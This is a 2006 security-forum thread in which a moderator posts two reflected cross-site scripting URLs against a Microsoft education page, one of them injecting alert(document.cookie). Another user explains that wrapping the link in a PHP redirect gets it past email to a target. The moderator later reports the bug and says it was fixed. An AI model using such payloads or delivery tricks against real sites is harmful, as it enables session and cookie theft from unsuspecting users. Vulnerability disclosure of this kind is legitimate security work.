|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 132
Members: 0
Total: 132
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
xss in microsoft.com |
|
Posted: Mon Aug 07, 2006 8:33 am |
|
|
ToXiC |
Moderator |
|
|
Joined: Dec 01, 2004 |
Posts: 181 |
Location: Cyprus |
|
|
|
|
|
|
emmm ... for those who will find it handy..nothing more to say or do
example 1:
Code: | http://www.microsoft.com/education/Tutorials.mspx?Act=Tutorials.mspx&Xslt=%2Fbusiness%2FXSLT%2FTutorialsResults_0405.xslt&Op1=%3Cscript%3Ealert(document.cookie)%3C/script%3E&Op2=all&Op4=all&SearchSubmit=Search |
example 2:
Code: |
http://www.microsoft.com/education/Tutorials.mspx?Act=Tutorials.mspx&Xslt=%2Fbusiness%2FXSLT%2FTutorialsResults_0405.xslt&Op1=%3Cscript%3Ealert("Fix your Damn XSS")%3C/script%3E&Op2=all&Op4=all&SearchSubmit=Search |
screenshot:
use it wisely
ToX |
|
_________________ who|grep -i blonde|talk; cd~;wine;talk;touch;unzip;touch; strip;gasp;finger;gasp;mount; fsck; more; yes; gasp; umount; make clean; sleep;wakeup;goto http://www.md5this.com |
|
|
|
|
:) |
|
Posted: Fri Aug 11, 2006 11:18 am |
|
|
oxygenne |
Advanced user |
|
|
Joined: Apr 13, 2005 |
Posts: 52 |
|
|
|
|
|
|
|
Unless your browser has scripting disabled, you should be returned to the page you were at in a couple seconds. Otherwise, please click here to return manually. |
|
|
|
|
|
Re: :) |
|
Posted: Fri Aug 18, 2006 9:59 am |
|
|
ToXiC |
Moderator |
|
|
Joined: Dec 01, 2004 |
Posts: 181 |
Location: Cyprus |
|
|
|
|
|
|
oxygenne wrote: | Unless your browser has scripting disabled, you should be returned to the page you were at in a couple seconds. Otherwise, please click here to return manually. |
xss still not fixed .. ok .. thats not the main purpose of that to have scripting disable .. i report it to microsoft .. check out the reply
Quote: | Hello xxxxxx,
Thank you for contacting Microsoft Online Customer Service.
I comprehend from your e-mail that you are providing feedback about a certain Microsoft web site. I understand the importance of the issue and look forward to assisting you.
However, the information you have sent us this time, is not specific enough. Hence please provide the following details for us to get a better understanding of your issue.
-Windows Version(E.g Windows XP Home):
-Application you area facing an issue with:
-Complete text of error message(If any):
-Detailed description of the issue:
I appreciate your patience and look forward to your reply.
Thank you for using Microsoft products and services.
Muktadeer
Microsoft Online Customer Service Representative
If you have any feedback about your Online Customer Service experience, please e-mail my manager, Nikhil Ramachandran, at managers@microsoft.com
|
I dont know what they understand or what they wanted to understand but now i am confused Its not my problem that microsoft site has a vulnerability .. and they tried to present it as my problem ahhaha |
|
_________________ who|grep -i blonde|talk; cd~;wine;talk;touch;unzip;touch; strip;gasp;finger;gasp;mount; fsck; more; yes; gasp; umount; make clean; sleep;wakeup;goto http://www.md5this.com |
|
|
|
|
|
|
|
Posted: Fri Aug 18, 2006 6:47 pm |
|
|
oxygenne |
Advanced user |
|
|
Joined: Apr 13, 2005 |
Posts: 52 |
|
|
|
|
|
|
|
Ok the problem was that sending direct of xss site to someones mail is not working but sending simple redirect page is working like a charm:D
<?php
header("Location: http://msn-xss site
exit;
?> |
|
|
|
|
Posted: Tue Aug 22, 2006 2:17 pm |
|
|
ToXiC |
Moderator |
|
|
Joined: Dec 01, 2004 |
Posts: 181 |
Location: Cyprus |
|
|
|
|
|
|
ok microsoft fixed the bug ..
after a week that was quick |
|
_________________ who|grep -i blonde|talk; cd~;wine;talk;touch;unzip;touch; strip;gasp;finger;gasp;mount; fsck; more; yes; gasp; umount; make clean; sleep;wakeup;goto http://www.md5this.com |
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|